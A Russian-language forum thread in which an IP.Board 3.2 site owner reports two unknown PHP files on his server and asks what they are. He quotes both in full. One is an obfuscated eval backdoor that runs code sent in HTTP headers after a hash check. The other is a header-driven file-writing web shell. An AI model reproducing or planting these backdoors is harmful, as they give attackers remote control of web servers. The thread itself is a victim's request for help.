Posted 5 января, 20159 yr comment_77568 Здравствуйте! Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php. Файл нашел в 2 местах, содержимое отличается: В корне: <?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?> В папке cache: ============================================================================== URL: /index.php/index.php Date: Tue, 20 Nov 2012 10:16:53 +0000 IP Address: 31.3.250.226 Time Taken: 0.04346 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил. Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер. Внимание, вопросы: 1. Что это такое? 2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)? 3. Что оно делало? Точная версия борды: IP.Board Version 3.2.0 (ID:32003) Edited 5 января, 20159 yr by EIKA
5 января, 20159 yr comment_77575 бессмысленные посты не нужно писать. Почему бессмысленные? IPB 3.2 забита уязвимостями
5 января, 20159 yr comment_77587 Почему бессмысленные? IPB 3.2 забита уязвимостями ТС спрашивает о файле, а не о том, как защитится.
5 января, 20159 yr Author comment_77603 Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.